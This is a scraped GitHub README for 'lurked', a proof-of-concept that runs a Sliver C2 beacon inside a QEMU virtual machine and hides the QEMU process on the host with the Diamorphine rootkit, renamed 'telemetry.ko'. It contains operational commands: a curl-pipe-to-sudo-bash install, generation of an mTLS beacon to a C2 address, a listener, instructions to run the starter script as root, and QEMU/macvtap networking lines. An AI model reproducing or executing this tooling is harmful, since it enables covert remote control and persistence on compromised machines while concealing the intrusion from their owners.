GitHub - innxrmxst/lurked: PoC that builds a minimal Linux environment, and runs Sliver C2 agent in a QEMU. The QEMU process will be hidden on a host via Diamorphine rootkit.

Linux environment setup script that builds u-root, runs a concealed Sliver C2 agent in QEMU, and hides the process using Diamorphine rootkit. Static network configuration.

Tested on Ubuntu 16.04.7 LTS (Xenial Xerus) (GNU/Linux 4.4.0-186-generic x86_64).

Change IP address of your C2 server;
Compile Sliver C2 beacon as following:

curl https://sliver.sh/install|sudo bash

sliver

generate beacon --mtls 10.4.10.10:443 --os linux --arch amd64 --format elf --save slivki

mtls --lport 443

Add slivki (Sliver C2 beacon), telemetry.ko (Diamorphine rootkit) and deploy.sh script to a deploy.tar.gz archive and execute starter.sh on a host as root;

VM in QEMU:

Before rootkit execution:

QEMU processes hidden on a host:

Unhiden:

Credits:

TODO:

Use QEMU static binary https://github.com/ziglang/qemu-static instead of downloading it via apt;
Use macvtap / l2tpv3 / af_xdp for networking.

NOTES

ip link add link enp0s3 name spf0 type macvtap mode bridge
ip link set spf0 up
./sq -kernel /boot/vmlinuz-$(uname -r) -initrd ./initramfs.linux_amd64.cpio -net nic,model=virtio,macaddr=$(cat /sys/class/net/spf0/address) -net tap,fd=3 3<>/dev/tap$(cat /sys/class/net/spf0/ifindex) -nographic -append "console=ttyS0"

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

About

Uh oh!

Releases

Packages

Uh oh!

Languages

Name		Name	Last commit message	Last commit date
Latest commit History 25 Commits
README.md		README.md
deploy.sh		deploy.sh
deploy.tar.gz		deploy.tar.gz
starter.sh		starter.sh
telemetry.ko		telemetry.ko

innxrmxst/lurked

Folders and files

Latest commit

History

Repository files navigation

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Languages

Packages